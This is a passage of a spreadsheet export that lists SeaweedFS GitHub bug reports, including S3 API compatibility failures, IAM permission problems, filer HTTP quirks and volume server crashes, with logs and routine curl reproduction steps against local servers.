    <t>**Describe the bug** Error filer store delete Folder Children See https://fromdual.com/keep-your-galera-cluster-up-and-running-by-all-means  filer_1 | I0611 10:13:05 1 abstract_sql_store.go:282] delete /buckets/registry/docker/registry/v2/blobs/sha256 SQL DELETE FROM `filemeta` WHERE dirhash=? AND directory=? -4910119483806141165 filer_1 | I0611 10:13:05 1 filer_delete_entry.go:39] delete directory /buckets/registry: filer store delete: deleteFolderChildren /buckets/registry/docker/registry/v2/blobs/sha256: Error 1180: wsrep_max_ws_rows exceeded filer_1 | I0611 10:13:05 1 error_handler.go:79] status 500 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; filer_1 | &lt;Error&gt;&lt;Code&gt;InternalError&lt;/Code&gt;&lt;Message&gt;We encountered an internal error, please try again.&lt;/Message&gt;&lt;Resource&gt;/registry&lt;/Resource&gt;&lt;RequestId&gt;1623406385367150308&lt;/RequestId&gt;&lt;BucketName&gt;registry&lt;/BucketName&gt;&lt;/Error&gt;  **System Setup** master branch **Expected behavior** force small transactions when deleting Folder Children</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2177</t>
  </si>
  <si>
    <t>Volume on ARMv7 throws</t>
  </si>
  <si>
    <t>**Describe the bug** Volume on ARM32 throws an "unaligned 64-bit atomic operation" error on upload of a file **System Setup** - /usr/bin/weed volume -ip=odroid3.node.dc1.consul -port=9444 -mserver=seaweedfsmaster0.service.dc1.consul:9333,seaweedfsmaster1.service.dc1.consul:9333,seaweedfsmaster2.service.dc1.consul:9333 -dir=/data/vol - OS version = Ubuntu 5.4.118-221 armv7l armv7l armv7l GNU/Linux - `weed version' = version 30GB 2.56 a2979aa linux arm - hardware = Odroid HC1 (Samsung Exynos5422 Cortex-A15 2Ghz and Cortex-A7 Octa cores) **Expected behavior** Not to crash **Additional context** 2021/07/02 15:46:52 http: panic serving 192.168.1.238:40226: unaligned 64-bit atomic operation goroutine 101 [running]: net/http.(*conn).serve.func1(0x32244e0) /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/net/http/server.go:1824 +0x104 panic(0x171c1b8, 0x1e1dca8) /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/runtime/panic.go:971 +0x4b4 runtime/internal/atomic.panicUnaligned() /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/runtime/internal/atomic/unaligned.go:8 +0x24 runtime/internal/atomic.Load64(0x31473e4, 0xe5b38, 0x0) /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/runtime/internal/atomic/asm_arm.s:263 +0x14 github.com/chrislusf/seaweedfs/weed/server.(*VolumeServer).privateStoreHandler(0x3147380, 0x1e56c4c, 0x34581e0, 0x30de680) /home/travis/gopath/src/github.com/chrislusf/seaweedfs/weed/server/volume_server_handlers.go:49 +0x4bc net/http.HandlerFunc.ServeHTTP(0x300fa88, 0x1e56c4c, 0x34581e0, 0x30de680) /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/net/http/server.go:2069 +0x34 net/http.(*ServeMux).ServeHTTP(0x325b440, 0x1e56c4c, 0x34581e0, 0x30de680) /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/net/http/server.go:2448 +0x16c net/http.serverHandler.ServeHTTP(0x30ec360, 0x1e56c4c, 0x34581e0, 0x30de680) /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/net/http/server.go:2887 +0x88 net/http.(*conn).serve(0x32244e0, 0x1e59564, 0x31c09c0) /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/net/http/server.go:1952 +0x7f0 created by net/http.(*Server).Serve /home/travis/.gimme/versions/go1.16.5.linux.amd64/src/net/http/server.go:3013 +0x318</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2371</t>
  </si>
  <si>
    <t>[s3] Content Disposition support</t>
  </si>
  <si>
    <t>**Describe the bug** ContentDisposition and ResponseContentDisposition parameters are ignored When using s3 api, ContentDisposition is always set to 'inline; filename=&lt;key&gt;' Example with boto3: Setting ContentDisposition during put: python3 s3.put_object(Bucket='test', Key='test.jpeg', Body='test.jpeg', ContentDisposition='attachment; filename="test.jpeg') {'ResponseMetadata': {'RequestId': '1633946607781063224', 'HostId': '', 'HTTPStatusCode': 200, 'HTTPHeaders': {'date': 'Mon, 11 Oct 2021 10:03:27 GMT', 'content-length': '0', 'connection': 'keep-alive', 'accept-ranges': 'bytes', 'etag': '"bb1469ad3d21a04760cf719a86f2e7be"', 'x-amz-request-id': '1633946607781063224', 'strict-transport-security': 'max-age=15724800; includeSubDomains', }, 'RetryAttempts': 0}, 'ETag': '"bb1469ad3d21a04760cf719a86f2e7be"'} s3.get_object(Bucket='test', Key='test.jpeg') {'ResponseMetadata': {'HTTPStatusCode': 200, 'HTTPHeaders': {'date': 'Mon, 11 Oct 2021 10:03:45 GMT', 'content-type': 'image/jpeg', 'content-length': '9', 'connection': 'keep-alive', 'accept-ranges': 'bytes', 'content-disposition': 'inline; filename="test.jpeg"', 'etag': '"bb1469ad3d21a04760cf719a86f2e7be"', 'last-modified': 'Mon, 11 Oct 2021 10:03:27 GMT', 'strict-transport-security': 'max-age=15724800; includeSubDomains', }, 'RetryAttempts': 0}, 'AcceptRanges': 'bytes', 'LastModified': datetime.datetime(2021, 10, 11, 10, 3, 27, tzinfo=tzutc()), 'ContentLength': 9, 'ETag': '"bb1469ad3d21a04760cf719a86f2e7be"', 'ContentDisposition': 'inline; filename="test.jpeg"', 'ContentType': 'image/jpeg', 'Metadata': {}, 'Body': &lt;botocore.response.StreamingBody at 0x1108820d0&gt;}  Setting ResponseContentDisposition: python3 s3.get_object(Bucket='test', Key='test.jpeg', ResponseContentDisposition='attachment; filename=test.jpeg') {'ResponseMetadata': {'HTTPStatusCode': 200, 'HTTPHeaders': {'date': 'Mon, 11 Oct 2021 10:07:56 GMT', 'content-type': 'image/jpeg', 'content-length': '9', 'connection': 'keep-alive', 'accept-ranges': 'bytes', 'content-disposition': 'inline; filename="test.jpeg"', 'etag': '"bb1469ad3d21a04760cf719a86f2e7be"', 'last-modified': 'Mon, 11 Oct 2021 10:03:27 GMT', 'strict-transport-security': 'max-age=15724800; includeSubDomains' }, 'RetryAttempts': 0}, 'AcceptRanges': 'bytes', 'LastModified': datetime.datetime(2021, 10, 11, 10, 3, 27, tzinfo=tzutc()), 'ContentLength': 9, 'ETag': '"bb1469ad3d21a04760cf719a86f2e7be"', 'ContentDisposition': 'inline; filename="test.jpeg"', 'ContentType': 'image/jpeg', 'Metadata': {}, 'Body': &lt;botocore.response.StreamingBody at 0x110882340&gt;}  **System Setup** seaweedfs 2.70 **Expected behavior** Setting ContentDisposition parameter during put should set the ContentDisposition in object metadata, setting ResponseContentDisposition during get should only set this in reposnse metadata</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2387</t>
  </si>
  <si>
    <t>[s3] FAILED tests</t>
  </si>
  <si>
    <t xml:space="preserve"> 2.72    FAIL: s3tests_boto3.functional.test_s3.test_copy_object_ifnonematch_failed  Traceback (most recent call last): File "/opt/s3-tests/virtualenv/lib/python3.8/site-packages/nose/case.py", line 198, in runTest self.test(*self.arg) File "/opt/s3-tests/s3tests_boto3/functional/test_s3.py", line 13028, in test_copy_object_ifnonematch_failed eq(body, 'bar') AssertionError: 'bar\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 != 'bar'    FAIL: s3tests_boto3.functional.test_s3.test_object_write_check_etag  Traceback (most recent call last): File "/opt/s3-tests/virtualenv/lib/python3.8/site-packages/nose/case.py", line 198, in runTest self.test(*self.arg) File "/opt/s3-tests/s3tests_boto3/functional/test_s3.py", line 2094, in test_object_write_check_etag eq(response['ETag'], '"37b51d194a7513e45b56f6524f2d51f2"') AssertionError: '"9997a36a88a451df9f4c4552f8e884fa"' != '"37b51d194a7513e45b56f6524f2d51f2"' &gt;&gt; raise AssertionError(None or "%r != %r" % ('"9997a36a88a451df9f4c4552f8e884fa"', '"37b51d194a7513e45b56f6524f2d51f2"'))    FAIL: s3tests_boto3.functional.test_s3.test_object_head_zero_bytes  Traceback (most recent call last): File "/opt/s3-tests/virtualenv/lib/python3.8/site-packages/nose/case.py", line 198, in runTest self.test(*self.arg) File "/opt/s3-tests/s3tests_boto3/functional/test_s3.py", line 2083, in test_object_head_zero_bytes eq(response['ContentLength'], 0) AssertionError: 512 != 0 &gt;&gt; raise AssertionError(None or "%r != %r" % (512, 0)) </t>
  </si>
  <si>
    <t>? - dev tests</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2389</t>
  </si>
  <si>
    <t>[s3test] PutObjectTagging, GetObjectTagging and DeleteObjectTagging</t>
  </si>
  <si>
    <t>Nexus Blob Storage requires PutObjectTagging, GetObjectTagging and DeleteObjectTagging https://help.sonatype.com/repomanager3/repository-management/storage-guide/configuring-blob-stores#ConfiguringBlobStores-AWSSimpleStorageService(S3)  s3tests_1 |  s3tests_1 | FAIL: s3tests_boto3.functional.test_s3.test_put_obj_with_tags s3tests_1 |  s3tests_1 | Traceback (most recent call last): s3tests_1 | File "/opt/s3-tests/virtualenv/lib/python3.8/site-packages/nose/case.py", line 198, in runTest s3tests_1 | self.test(*self.arg) s3tests_1 | File "/opt/s3-tests/s3tests_boto3/functional/test_s3.py", line 11449, in test_put_obj_with_tags s3tests_1 | eq(response_tagset, tagset) s3tests_1 | AssertionError: [{'Key': 'foo', 'Value': 'bar'}] != [{'Key': 'bar', 'Value': ''}, {'Key': 'foo', 'Value': 'bar'}] s3tests_1 | &gt;&gt; raise AssertionError(None or "%r != %r" % ([{'Key': 'foo', 'Value': 'bar'}], [{'Key': 'bar', 'Value': ''}, {'Key': 'foo', 'Value': 'bar'}]))   s3tests_1 |  s3tests_1 | FAIL: s3tests_boto3.functional.test_s3.test_put_delete_tags s3tests_1 |  s3tests_1 | Traceback (most recent call last): s3tests_1 | File "/opt/s3-tests/virtualenv/lib/python3.8/site-packages/nose/case.py", line 198, in runTest s3tests_1 | self.test(*self.arg) s3tests_1 | File "/opt/s3-tests/s3tests_boto3/functional/test_s3.py", line 11323, in test_put_delete_tags s3tests_1 | eq(response['ResponseMetadata']['HTTPStatusCode'], 200) s3tests_1 | AssertionError: 204 != 200 s3tests_1 | &gt;&gt; raise AssertionError(None or "%r != %r" % (204, 200))   s3tests_1 |  s3tests_1 | FAIL: s3tests_boto3.functional.test_s3.test_get_obj_tagging s3tests_1 |  s3tests_1 | Traceback (most recent call last): s3tests_1 | File "/opt/s3-tests/virtualenv/lib/python3.8/site-packages/nose/case.py", line 198, in runTest s3tests_1 | self.test(*self.arg) s3tests_1 | File "/opt/s3-tests/s3tests_boto3/functional/test_s3.py", line 11140, in test_get_obj_tagging s3tests_1 | eq(response['ResponseMetadata']['HTTPStatusCode'], 200) s3tests_1 | AssertionError: 204 != 200 s3tests_1 | &gt;&gt; raise AssertionError(None or "%r != %r" % (204, 200))   E1020 11:37:12 1 s3api_object_tagging_handlers.go:59] PutObjectTaggingHandler Unmarshal /package-cache-nexus-proxy-cache/nexus/cache/content/vol-31/chap-12/aecabacb-1999-47b8-80f7-1dad5b639ed0.bytes?tagging: expected element &lt;Tagging&gt; in name space http://s3.amazonaws.com/doc/2006-03-01/ but have no name space</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2417</t>
  </si>
  <si>
    <t>S3 using IAM action Write does not work properly</t>
  </si>
  <si>
    <t xml:space="preserve">**Describe the bug** I have followed the documentation to enable S3 IAM identities but it seems that the Write action for an identity does not allow to actually create files using S3. **System Setup** - Running seaweedfs from Docker, config below  docker_container: name: seaweedfs image: chrislusf/seaweedfs state: started restart_policy: unless-stopped pull: true user: nobody:20000 command: server -dir="/data" -volume.max=0 -master.volumePreallocate=false -master.volumeSizeLimitMB=1024 -s3 -s3.config=/etc/seaweedfs-s3-config.json comparisons: image: strict ports: - "127.0.0.1:28080:8080" - "127.0.0.1:18080:18080" - "127.0.0.1:8333:8333" volumes: - "/etc/seaweedfs-s3-config.json:/etc/seaweedfs-s3-config.json:ro" - "/var/lib/seaweedfs-data:/data"  - `version 30GB 2.76 1b90d607 linux amd64` - Using `rclone` for file operations **Expected behavior** I would expect that the `Write` permission allow to create a file in a bucket, otherwise I have to grant `Admin` which is not very granular. **IAM config**:  { "identities": [ { "name": "admin", "credentials": [ { "accessKey": "admin_access", "secretKey": "admin_secret" } ], "actions": [ "Admin", "Read", "List", "Tagging", "Write" ] }, { "name": "rclone", "credentials": [ { "accessKey": "rclone_access", "secretKey": "rclone_secret" } ], "actions": [ "Read", "Write", "List" ] } ] }  **rclone config**:  [weed] type = s3 provider = Other access_key_id = rclone_access secret_access_key = rclone_secret endpoint = http://127.0.0.1:8333 acl = private [weedAdmin] type = s3 provider = Other access_key_id = admin_access secret_access_key = admin_secret endpoint = http://127.0.0.1:8333 acl = private  **Using rclone with low-priv user**:  #Bucket listing works # rclone lsd weed: -1 2021-11-02 15:11:23 -1 photos_staging_dir #File listing works # rclone ls weed:photos_staging_dir #Creating a file fails # rclone touch weed:photos_staging_dir/fstab 2021/11/02 16:06:26 ERROR : Attempt 1/3 failed with 1 errors and: failed to touch (create): AccessDenied: Access Denied. status code: 403, request id: 1635869186380983481, host id: 2021/11/02 16:06:26 ERROR : Attempt 2/3 failed with 1 errors and: failed to touch (create): AccessDenied: Access Denied. status code: 403, request id: 1635869186384910685, host id: 2021/11/02 16:06:26 ERROR : Attempt 3/3 failed with 1 errors and: failed to touch (create): AccessDenied: Access Denied. status code: 403, request id: 1635869186388820806, host id: 2021/11/02 16:06:26 Failed to touch: failed to touch (create): AccessDenied: Access Denied. status code: 403, request id: 1635869186388820806, host id:  Creating empty file with admin identity:  rclone touch weedAdmin:photos_staging_dir/fstab  Created file can now be written/deleted by low-priv identity:  # rclone copy /etc/fstab weed:photos_staging_dir/ # rclone ls weed:photos_staging_dir/ 881 fstab #rclone delete weed:photos_staging_dir/fstab </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2434</t>
  </si>
  <si>
    <t>[s3] HeadBucketHandler forbidden if is not super Admin or Owner</t>
  </si>
  <si>
    <t xml:space="preserve">**Describe the bug** HeadBucketHandler forbidden if is not super Admin  I1110 17:30:03 1 auth_credentials.go:225] user name: bennu actions: [Admin:bennu-*], action: Admin I1110 17:30:03 1 s3api_bucket_handlers.go:171] HeadBucketHandler bennu-client-files I1110 17:30:03 1 error_handler.go:79] status 403 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;Error&gt;&lt;Code&gt;AccessDenied&lt;/Code&gt;&lt;Message&gt;Access Denied.&lt;/Message&gt;&lt;Resource&gt;/&lt;/Resource&gt;&lt;RequestId&gt;1636565403160014337&lt;/RequestId&gt;&lt;BucketName&gt;bennu-client-files&lt;/BucketName&gt;&lt;/Error&gt;   aws --profile bennu --endpoint-url http://localhost:8333 s3api head-bucket --bucket bennu-client-files --debug  I don't quite understand what is being cheked here https://github.com/chrislusf/seaweedfs/blob/35c37562bc34393853de1c54ed06740bdffdf919/weed/s3api/s3api_bucket_handlers.go#L195  &gt; fs.meta.cat /buckets/bennu-client-files { "name": "bennu-client-files", "isDirectory": true, "chunks": [ ], "attributes": { "fileSize": "0", "mtime": "1633508622", "fileMode": 2147484159, "uid": 0, "gid": 0, "crtime": "1633508622", "mime": "", "replication": "", "collection": "", "ttlSec": 0, "userName": "", "groupName": [ ], "symlinkTarget": "", "md5": null, "diskType": "" }, "extended": { "s3-identity-id": "c2VydmljZS1saWJyYXJ5" }, "hardLinkId": null, "hardLinkCounter": 0, "content": null, "remoteEntry": null }  **System Setup**  2.75 </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2583</t>
  </si>
  <si>
    <t>[s3] Bug with backward compatibility of accesses 2.85</t>
  </si>
  <si>
    <t xml:space="preserve">version  2.85   Jan 12, 2022 @ 15:05:13.935 | I0112 10:05:13 1 auth_credentials.go:219] v4 auth type -- | -- | Jan 12, 2022 @ 15:05:13.935 | I0112 10:05:13 1 error_handler.go:85] status 403 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; | Jan 12, 2022 @ 15:05:13.935 | I0112 10:05:13 1 auth_credentials.go:248] user name: cdn actions: [Admin:cdn-*], action: Write | Jan 12, 2022 @ 15:05:13.935 | I0112 10:05:13 1 error_handler.go:85] status 403 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; | Jan 12, 2022 @ 15:05:13.935 | &lt;Error&gt;&lt;Code&gt;AccessDenied&lt;/Code&gt;&lt;Message&gt;Access Denied.&lt;/Message&gt;&lt;Resource&gt;/d28547ea7e450b9d42b86d2dd1dd89b02598dce2.original&lt;/Resource&gt;&lt;RequestId&gt;1641981913107869339&lt;/RequestId&gt;&lt;Key&gt;d28547ea7e450b9d42b86d2dd1dd89b02598dce2.original&lt;/Key&gt;&lt;BucketName&gt;cdn&lt;/BucketName&gt;&lt;/Error&gt; </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2593</t>
  </si>
  <si>
    <t>When "X-Amz-Copy-Source" a folder, weed create a new file with "Filer listing Html" result.</t>
  </si>
  <si>
    <t>The response of "CopyObject" should be 40x.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2648</t>
  </si>
  <si>
    <t>[store] failed to write to local disk: invalid argument</t>
  </si>
  <si>
    <t xml:space="preserve">**Describe the bug** logs  upload_content.go:109] uploading to http://fast-volume-6.s3-fast-volume.service.dcdp.consul:8080/825,01366342ecebf5fc: unmarshalled error http://fast-volume-6.s3-fast-volume.service.dcdp.consul:8080/825,01366342ecebf5fc: failed to write to local disk: invalid argument | fast-api-658d59f67b-vd9ct store_replicate.go:48] failed to write to local disk: invalid argument | fast-volume-6 common.go:69] response method:POST URL:/825,01366342ecebf5fc with httpStatus:500 and JSON:{"name":"0006.part","size":5242880,"error":"failed to write to local disk: invalid argument","eTag":"971972b3"} | fast-volume-6  **System Setup**  2.88 </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/3467</t>
  </si>
  <si>
    <t>Filer if-modified-since check doesn't fire on "exact"</t>
  </si>
  <si>
    <t>**Describe the bug** Filer does not return HTTP 304 if the `if-modified-since` value is exact the same as the `Last-Modfied` header **System Setup** - `weed server -dataCenter=$HOSTNAME -ip=$HOSTNAME -master.dir=/meta -master.peers="app1:9333,app2:9333,app3:9333" -dir=/data -volume.dir.idx=/meta -volume.index=leveldbLarge -volume.max=0 -rack=1 -filer.encryptVolumeData -volume.fileSizeLimitMB=4096 -master.volumeSizeLimitMB=1024 -filer.defaultReplicaPlacement=100 -filer.saveToFilerLimit=4096 -filer"` - Ubuntu Server **Expected behavior** Filer should return 304: Not modified to save bandwidth **Screenshots** bash system@app2:~$ curl --head --http1.1 -H 'if-modified-since: Thu, 18 Aug 2022 15:40:16 GMT' 'http://localhost:8888/qr-code.svg' HTTP/1.1 304 Not Modified Last-Modified: Thu, 18 Aug 2022 15:40:15 GMT Server: SeaweedFS Filer 30GB 3.22 Date: Fri, 19 Aug 2022 15:29:42 GMT system@app2:~$ curl --head --http1.1 -H 'if-modified-since: Thu, 18 Aug 2022 15:40:15 GMT' 'http://localhost:8888/qr-code.svg' HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Expose-Headers: Content-Disposition Cache-Control: no-cache Content-Disposition: inline; filename="qr-code.svg" Content-Length: 209510 Content-Type: image/svg+xml Etag: "8ab857fb2ea442f951af494a746b1abf" Last-Modified: Thu, 18 Aug 2022 15:40:15 GMT Server: SeaweedFS Filer 30GB 3.22 Date: Fri, 19 Aug 2022 15:29:50 GMT  **Additional context** Filer will say `HTTP/1.1 304 Not Modified` with a value later than it's own `Last-Modified` but this will most likely never be the same in the case of a browser. I was testing via filer web ui in chrome.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/3476</t>
  </si>
  <si>
    <t>HTTP Filer truncates uploads which begin with /etc</t>
  </si>
  <si>
    <t>The built-in http server in `filer` cannot handle uploads where the root of the path begins with `/etc`. The file is always truncated to `4MB`. Tested using `Docker version 20.10.12-ce, build 459d0dfbbb51` on `openSUSE Leap 15.3`. There is a `Makefile` and attached server log at the end of this post. Uploading files with `curl`  dd if=/dev/urandom of=rands bs=1k count=100k curl -F file=@rands http://10.1.0.8:8889/petc33333/etc3 {"name":"rands","size":104857600} curl -F file=@rands http://10.1.0.8:8889/etc33333/etc3 {"name":"rands","size":4194304} curl -F file=@rands http://10.1.0.8:8889/petc932 {"name":"rands","size":104857600} curl -F file=@rands http://10.1.0.8:8889/etc932 {"name":"rands","size":4194304}  Running a `HEAD` request against each uploaded file.  curl -I http://10.1.0.8:8889/petc33333/etc3 HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Expose-Headers: Content-Disposition Content-Disposition: inline; filename="etc3" Content-Length: 104857600 Etag: "3b3a28a324f125fb2423f4aa627c1e74" Last-Modified: Sun, 21 Aug 2022 19:32:01 GMT Server: SeaweedFS Filer 30GB 3.22 Date: Sun, 21 Aug 2022 19:32:04 GMT curl -I http://10.1.0.8:8889/etc33333/etc3 HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Expose-Headers: Content-Disposition Content-Disposition: inline; filename="etc3" Content-Length: 4194304 Etag: "1d65cef5475887ca24f320e9d7cb5d9f" Last-Modified: Sun, 21 Aug 2022 19:32:02 GMT Server: SeaweedFS Filer 30GB 3.22 Date: Sun, 21 Aug 2022 19:32:04 GMT curl -I http://10.1.0.8:8889/petc932 HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Expose-Headers: Content-Disposition Content-Disposition: inline; filename="petc932" Content-Length: 104857600 Etag: "3b3a28a324f125fb2423f4aa627c1e74" Last-Modified: Sun, 21 Aug 2022 19:32:03 GMT Server: SeaweedFS Filer 30GB 3.22 Date: Sun, 21 Aug 2022 19:32:04 GMT curl -I http://10.1.0.8:8889/etc932 HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Expose-Headers: Content-Disposition Content-Disposition: inline; filename="etc932" Content-Length: 4194304 Etag: "1d65cef5475887ca24f320e9d7cb5d9f" Last-Modified: Sun, 21 Aug 2022 19:32:03 GMT Server: SeaweedFS Filer 30GB 3.22 Date: Sun, 21 Aug 2022 19:32:04 GMT  Makefile to replicate the behavior makefile .PHONY: example upload heads dev-filer HOST:=http://10.1.0.8:8889 dev-filer: docker run -it --rm --name $@ --entrypoint /usr/bin/weed \ -p 8889:8889 -p 6062:6062 \ chrislusf/seaweedfs:3.22 \ -v 2 server -volume.max=5000 -dir="/data" -master.volumeSizeLimitMB=2048 -master.electionTimeout 1s -master.port=9444 -volume.port=9445 \ -filer -ip.bind 0.0.0.0 -filer.port=8889 -debug -debug.port 6062 rands: dd if=/dev/urandom of=rands bs=1k count=100k example: upload heads upload: rands curl -F file=@rands ${HOST}/petc33333/etc3 @echo curl -F file=@rands ${HOST}/etc33333/etc3 @echo curl -F file=@rands ${HOST}/petc932 @echo curl -F file=@rands ${HOST}/etc932 @echo @echo heads: curl -I ${HOST}/petc33333/etc3 curl -I ${HOST}/etc33333/etc3 curl -I ${HOST}/petc932 curl -I ${HOST}/etc932  [log.txt](https://github.com/seaweedfs/seaweedfs/files/9389838/log.txt)</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/4088</t>
  </si>
  <si>
    <t>It is not possible to request a file via master if the volume is in a read-only state</t>
  </si>
  <si>
    <t>I have one master server and one volume server, I have moved one of the volumes to the read-only state. The server has lost information about volumes that are in the read-only state. The file can be requested only from the volume server. Procedure of actions: 1) Uploading a file 2) I make the volume read-only  lock volume.marknode 172.16.202.6:8080 -volumeId 3 -readonly unlock  3) Trying to upload a file  wget 172.16.202.6:9333/3,013c6a774d --2022-12-27 11:52:18-- http://172.16.202.6:9333/3,013c6a774d Connecting to 172.16.202.6:9333 connected. HTTP request sent, awaiting response 404 Not Found 2022-12-27 11:52:18 ERROR 404: Not Found.  **System Setup** ./weed master -ip=172.16.202.6 ./weed -v=4 volume -index=leveldb -pprof=true -max=100 -mserver="172.16.202.6:9333" -port=8080 -dir=/storage - ubuntu 22/04 - The problem was found on version 3.37, 3.36, 3.28, the latest version on which it works is 3.26 - version 3.27 have problem with set read-only from shell  volume.mark -node 172.16.202.6:8080 -volumeId 3 -readonly error: rpc error: code = Unknown desc = grpc VolumeMarkReadonly with master: 172.16.202.6:9333%!(EXTRA *errors.errorString=set volume 3 to read only on master: rpc error: code = Unimplemented desc = method VolumeMarkReadonly not implemented)  **Expected behavior** I expect that the master will allow requesting files from volumes that have moved to the read-only state.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/4143</t>
  </si>
  <si>
    <t>The bucket naming rules conflict when docking with minio</t>
  </si>
  <si>
    <t>When uploading buckets through java minio, minio prompts me that the buckets to be transferred do not conform to the naming rules of S3 buckets My bucket name is 10000_ test However, it cannot be used in the S3 naming specification_ To name it. aws-cli passed the name, but the seaweedfs server did not verify the bucket name So I suggest checking the incoming bucket name on the seeweedfs server to ensure that the system has stronger compatibility</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/4270</t>
  </si>
  <si>
    <t>filer api should return client error (4XX) code instead 500 if dir already exists</t>
  </si>
  <si>
    <t>Sponsors SeaweedFS via Patreon https://www.patreon.com/seaweedfs **Describe the bug** Right now if `dir` (filer.path) exists and `/POST` request is sent to that dir, filer returns `500 internal server error` with message `{"error":"dir /foo already exists"}`. Ideally here filer should return Client Error (4XX) code like `409` instead of `500`. **System Setup** Setup contains empty storage with default settings started using below commands  weed master -mdir="." -ip=localhost weed volume -max=100 -mserver="localhost:9333" -dir="./data" weed filer -ip=localhost -port=8888 -master=localhost:9333  Weed version is `version 30GB 3.33 ee7bf69c0396098bce2d030f24dba5085c392b7c linux amd64`. Below are steps to reproduce  curl -vvv -X POST "http://localhost:8888/foo/" * Trying 127.0.0.1:8888 * Connected to localhost (127.0.0.1) port 8888 (#0) &gt; POST /foo/ HTTP/1.1 &gt; Host: localhost:8888 &gt; User-Agent: curl/7.81.0 &gt; Accept: */* &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 201 Created &lt; Content-Type: application/json &lt; Server: SeaweedFS Filer 30GB 3.33 &lt; Date: Sun, 05 Mar 2023 07:25:46 GMT &lt; Content-Length: 14 &lt; * Connection #0 to host localhost left intact {"name":"foo"} % curl -vvv -X POST "http://localhost:8888/foo/" * Trying 127.0.0.1:8888 * Connected to localhost (127.0.0.1) port 8888 (#0) &gt; POST /foo/ HTTP/1.1 &gt; Host: localhost:8888 &gt; User-Agent: curl/7.81.0 &gt; Accept: */* &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 500 Internal Server Error &lt; Content-Type: application/json &lt; Server: SeaweedFS Filer 30GB 3.33 &lt; Date: Sun, 05 Mar 2023 07:27:18 GMT &lt; Content-Length: 35 &lt; * Connection #0 to host localhost left intact {"error":"dir /foo already exists"}%  **Expected behavior** filer should return Client Error (4XX) code like `409` instead of `500`</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/4305</t>
  </si>
  <si>
    <t>s3.bucket.list file count mismatch</t>
  </si>
  <si>
    <t>**Describe the bug** s3.bucket.list file count is not correct **System Setup** - weed server -s3 -ip.bind=0.0.0.0 -dir=/disk/data1/weed,/disk/data2/weed -master.defaultReplication=002 -master.peers=192.168.3.101:9333,192.168.3.102:9333,192.168.3.103:9333,192.168.3.104:9333,192.168.3.105:9333 - Ubuntu 22.04.1 LTS - version 30GB 3.43 3227e4175e2bf8df2ac8aeeff8cf73a819abc5a7 linux amd64 - content of `filer.toml`  [leveldb2] enabled = false dir = "./filerldb2" # directory to store level db files [tikv] enabled = true pdaddrs = "pdhost1:2379, pdhost2:2379, pdhost3:2379"  **Expected behavior**  &gt; fs.ls /buckets/kuro3 prometheus.yml redirect.html weed &gt; s3.bucket.list kuro3 size:67565992 file:22  file count should be 3 **Screenshots** ![image](https://user-images.githubusercontent.com/12230174/224946805-9e45e296-35b9-4234-8015-61efb289116b.png) ![image](https://user-images.githubusercontent.com/12230174/224947463-8ca7b206-b065-4d5c-b62a-7adb847caa22.png) **Additional context** It seems that filer slices files into segments of 4MB, and `s3.bucket.list` counts each segment as a separate file.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/4467</t>
  </si>
  <si>
    <t>Master assigns write requests to unavailable volumes</t>
  </si>
  <si>
    <t>**Describe the bug** We performed reliability test for SeaweedFS in such a manner: - We wrote files through Filer in a loop - Sometimes we restarted one of Volume Servers (by random) to check how it will work, how many time will take recovery process depending on data size stored in SeaweedFS, how write process will work during partial outage (outage one of Volume Servers), etc. And during this simple test sometimes we observed such a problem: Filer reports that it cannot save the file with one of the following errors:  {"error":"unmarshalled error http://seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444/16498,4f3cc6ea382612: failed to write to replicas for volume 16498: [seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444]: upload 489.part 4194304 bytes to http://seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444/16498,4f3cc6ea382612?ts=1683812487\u0026ttl=\u0026type=replicate: Post \"http://seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444/16498,4f3cc6ea382612?ts=1683812487\u0026ttl=\u0026type=replicate\": dial tcp 10.183.0.39:8444: connect: connection refused"}  or  {"error":"upload 486.part 4194304 bytes to http://seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444/5122,1740bcaa7be3be: Post 